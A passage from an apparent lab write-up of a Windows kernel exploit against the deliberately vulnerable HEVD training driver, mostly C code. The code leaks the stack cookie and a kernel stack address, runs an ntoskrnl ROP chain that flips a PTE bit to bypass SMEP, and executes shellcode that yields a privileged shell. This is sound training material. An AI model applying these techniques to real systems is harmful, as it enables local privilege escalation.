  0x07 };

  shellcode = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  if (shellcode == NULL)
  {
    printf("[-] Failed to allocate memory for shellcode\n");
    return -1;
  }
  RtlCopyMemory(shellcode, sc, 129);

  /* Adjust the stack pointer */
  stack -= 0xb30;
  printf("\t[*] Writing stack cookie @{0x%p}\n", (LPVOID)stack);

  /* Overflow past the size of the buffer */
  for (i = 0; i < (512 / sizeof(uint64_t)); i++)
  {
    payload[i] = 0x4141414141414141;
  }

  payload[i++] = (stack ^ cookie); /* Stack Cookie */

  /* Offset to shellcode start */
  payload[i++] = 0x4343434343434343;
  payload[i++] = 0x4444444444444444;
  payload[i++] = 0x4545454545454545;
  payload[i++] = 0x4646464646464646;
  payload[i++] = 0x4747474747474747;
  payload[i++] = 0x4848484848484848;

  /* Prepare RDX for later: the XOR gadget below writes to [rbx+0x08], so we
     subtract 0x08 from the PTE address beforehand to compensate */
  payload[i++] = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret
  payload[i++] =      0x000008; // RDX = 0x08, subtracted from RAX after MiGetPteAddress()
  payload[i++] =      0x000000; // [filler]
  payload[i++] =      0x000000; // [filler]

  /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our
     userland code. The setup is as follows:

       RAX -> VOID *MiGetPteAddress(
         ( RCX == PTE / Userland Code )
       );

     Once the call is complete RAX should contain the pointer to our PTE. */
  payload[i++] = nt + 0x57699c;       // pop rcx ; ret
  payload[i++] = (uint64_t)shellcode; // *shellcode
  payload[i++] = nt + 0x24aaec;       // MiGetPteAddress()

  /* Now that we have obtained the PTE address, we can flip bit 2 (the U/S bit, mask 0x04)
       in order to mark the page as a kernel page (U -> K). We can do this using XOR ;) */
  payload[i++] = nt + 0x30fcf3; // sub rax, rdx ; ret
  payload[i++] = nt + 0x54f344; // push rax ; pop rbx ; ret
  payload[i++] = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret
  payload[i++] =      0x000004; // RDX = 0x04, the U/S bit mask XOR'd into the PTE
  payload[i++] =      0x000000; // [filler]
  payload[i++] =      0x000000; // [filler]
  payload[i++] = nt + 0x3788b6; // xor  [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret

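  /* Now we can spray our shellcode address since SMEP and VPS should be bypassed.
     The XOR gadget skips 0x58 bytes of stack (add rsp, 0x40 plus three pops)
     before its ret, so the 12th entry is the one execution returns to */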
  for (j = 0; j < 0xC; j++) {
    payload[i++] = (uint64_t)shellcode;
  }

  printf("\t[*] Generated %d bytes ...\n", (i * sizeof(uint64_t)));

  return (i * sizeof(uint64_t));
}

/* WriteBytes():
     Arbitrary write located in the TriggerArbitraryWrite() function */
void WriteBytes(HANDLE hHEVD, uint64_t* u64What, uint64_t* u64Where)
{
  DWORD dwBytesReturned = 0;
  WRITE_WHAT_WHERE www = { 0 };

  www.ullpWhere = u64Where;
  www.ullpWhat = u64What;

  printf("\t[*] Writing 0x%p to 0x%p\n", www.ullpWhat, www.ullpWhere);

  DeviceIoControl(hHEVD,
                  ARBITRARY_WRITE_IOCTL,
                  &www,
                  sizeof(WRITE_WHAT_WHERE),
                  NULL,
                  0x00,
                  &dwBytesReturned,
                  NULL);
}

/* LeakCookie():
     Leverage the ARBITRARY_WRITE_IOCTL to write to our variable in Userland from
     Kernel Land. */
uint64_t LeakCookie(HANDLE hHEVD, LPVOID lpvHEVD)
{
  uint64_t cookie = 0;
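  /* Cast to a byte pointer first; arithmetic on a void pointer is a compiler extension */
  uint64_t *pu64Cookie = (uint64_t *)((uint8_t *)lpvHEVD + 0x3000);

  printf("\t[*] Cookie located @{0x%p}\n", pu64Cookie);
  WriteBytes(hHEVD, pu64Cookie, &cookie);

  printf("\t[+] Cookie leaked: 0x%llx\n", (unsigned long long)cookie);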

  return cookie;
}

void LeakStack(wchar_t *targetPoC, LPVOID *lpvStackLeak)
{
  HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
  PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
  if (query == NULL) {
    printf("GetProcAddress() failed.\n");
    exit(-1);
  }

  ULONG len = 2000;
  NTSTATUS status = 0x00;
  PSYSTEM_EXTENDED_PROCESS_INFORMATION pProcessInfo = NULL;
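  do {
    len *= 2;
    if (pProcessInfo != NULL) {
      GlobalFree(pProcessInfo); /* release the previous, too-small buffer */
    }
    pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
    if (pProcessInfo == NULL) {
      printf("GlobalAlloc() failed.\n");
      exit(-1);
    }
    status = query(SystemExtendedProcessInformation, pProcessInfo, len, &len);
  } while (status == (NTSTATUS)0xc0000004); /* STATUS_INFO_LENGTH_MISMATCH */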
  
  if (status != (NTSTATUS)0x0) {
    printf("NtQuerySystemInformation failed with error code 0x%X\n", status);
    exit(-1);
  }

  LPVOID stackBase = NULL;
  LPVOID stackLimit = NULL;
  while (pProcessInfo->NextEntryOffset != 0x00) {
    // Strangely I was able to do this with the pProcessInfo->ImageName.Buffer being NULL? 
    if (StrStrW(pProcessInfo->ImageName.Buffer, targetPoC) != NULL) {
      printf("[*] Leaking stack from %ls\n", targetPoC);
      for (unsigned int i = 0; i < pProcessInfo->NumberOfThreads; i++) {
        stackBase = pProcessInfo->Threads[i].StackBase;
        stackLimit = pProcessInfo->Threads[i].StackLimit;
#ifdef _WIN64
        printf("\t[*] Stack base 0x%p\tStack limit 0x%p\n", stackBase, stackLimit);
#else
        printf("\t[*] Stack base 0x%X\tStack limit 0x%X\n", stackBase, stackLimit);
#endif
        break;
      }
    }

    if (!pProcessInfo->NextEntryOffset) {
      pProcessInfo = NULL;
    } else {
      pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)((ULONG_PTR)pProcessInfo + pProcessInfo->NextEntryOffset);
    }
  }

  *lpvStackLeak = stackBase;
}

/* Exploit():
     Stack Overflow (GS) */
int Exploit(HANDLE hHEVD)
{
  uint64_t cookie = 0x00;
  
  DWORD dwExploitBuffer = 0;
  DWORD dwBytesReturned = 0;

  LPVOID lpvStackLeak = NULL;
  LPVOID lpvMemoryAlloc = NULL;
  LPVOID lpvHEVD = GetKernelModuleBase("HEVD");
  LPVOID lpvNtKrnl = GetKernelModuleBase("ntoskrnl");

  if (lpvHEVD == NULL)
  {
    printf("[-] Failed to obtain the base address of HEVD\n");
    return -1;
  }

  if (lpvNtKrnl == NULL)
  {
    printf("[-] Failed to obtain the base address of ntoskrnl\n");
    return -1;
  }

  printf("[*] Exploitation started....\n");
  printf("[*] Base address of HEVD @{0x%p}\n", lpvHEVD);
  printf("[*] Base address of NT @{0x%p}\n", lpvNtKrnl);

  printf("[*] Attempting to leak __security_cookie\n");
  cookie = LeakCookie(hHEVD, lpvHEVD);
  if (cookie == 0x00)
  {
    printf("[-] Failed to leak stack cookie\n");
    return -1;
  }

  /* I found I need to hammer the stack leak to get it to work :| */
  while (1) {
    LeakStack(L"poc.exe", &lpvStackLeak);
    if (lpvStackLeak != NULL) {
      break;
    }
  }

  if (lpvStackLeak == NULL)
  {
    printf("[-] Failed to leak stack address\n");
    return -1;
  }

  lpvMemoryAlloc = VirtualAlloc(NULL,
                                ALLOCATION_SIZE,
                                (MEM_COMMIT | MEM_RESERVE),
                                PAGE_EXECUTE_READWRITE);
  if (lpvMemoryAlloc == NULL)
  {
    printf("[*] Failed to create exploitation buffer\n");
    return -1;
  }

  dwExploitBuffer = GenerateExploitBuffer(lpvNtKrnl, lpvStackLeak, cookie, lpvMemoryAlloc);
  printf("[*] Sending payload (%lu bytes)!!!\n", (unsigned long)dwExploitBuffer);

  DeviceIoControl(hHEVD,
                  STACK_OVERFLOW_GS_IOCTL,
                  lpvMemoryAlloc,
                  dwExploitBuffer,
                  NULL,
                  0x00,
                  &dwBytesReturned,
                  NULL);

  return CheckWin();
}

int main()
{
  HANDLE hHEVD = NULL;
  
  hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                      (GENERIC_READ | GENERIC_WRITE),
                      0x00,
                      NULL,
                      OPEN_EXISTING,
                      FILE_ATTRIBUTE_NORMAL,
                      NULL);

  if (hHEVD == INVALID_HANDLE_VALUE) /* CreateFileA() signals failure with INVALID_HANDLE_VALUE, not NULL */
  {
    printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
    return -1;
  }

  if (Exploit(hHEVD) == 0) {
    printf("[*] Exploitation success!!! Enjoy de shell!!\n\n");
    system("cmd.exe");
  } else {
    printf("[-] Exploitation failed, run again\n");
  }

  if (hHEVD != INVALID_HANDLE_VALUE) {
    CloseHandle(hHEVD);
  }
}

Once sent, we get our privileged shell!
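For reference, the first part of the payload built by GenerateExploitBuffer() can be summarized as a set of offsets. The sketch below only reproduces the layout (filler, cookie, gap, first return address) with placeholder values; the constant and function names are hypothetical, and the ROP chain itself is left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define FILLER_BYTES 512 /* bytes written before the cookie in the PoC        */
#define GAP_QWORDS   6   /* filler qwords between cookie and return address   */

/* Byte offset of the cookie slot from the start of the payload. */
size_t cookie_offset(void)
{
  return FILLER_BYTES;
}

/* Byte offset of the saved return address from the start of the payload. */
size_t return_address_offset(void)
{
  return FILLER_BYTES + sizeof(uint64_t) + GAP_QWORDS * sizeof(uint64_t);
}

/* Fills payload up to and including the first return address.
   Returns the number of qwords written, or 0 if the buffer is too small. */
size_t build_layout(uint64_t *payload, size_t capacity_qwords,
                    uint64_t forged_cookie, uint64_t first_return)
{
  size_t i = 0;
  size_t j = 0;
  size_t needed = return_address_offset() / sizeof(uint64_t) + 1;

  assert(payload != NULL);
  if (capacity_qwords < needed)
    return 0;

  for (i = 0; i < FILLER_BYTES / sizeof(uint64_t); i++)
    payload[i] = 0x4141414141414141ULL; /* fills the kernel buffer */

  payload[i++] = forged_cookie;         /* lands in the cookie slot */

  for (j = 0; j < GAP_QWORDS; j++)
    payload[i++] = 0x4343434343434343ULL; /* data between cookie and return */

  payload[i++] = first_return;          /* overwrites the return address */

  return i;
}
```

The cookie sits at offset 0x200 and the return address at offset 0x238. These offsets line up with the Ghidra names local_238 and local_38 if those names encode the distance from the return address, which is an assumption about the naming and not something stated in the analysis above.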

Sources
#

https://kristal-g.github.io/2021/02/07/HEVD_StackOverflowGS_Windows_10_RS5_x64.html
https://github.com/sam-b/windows_kernel_address_leaks/tree/3810bec445c0afaa4e23338241ba0359aea398d1
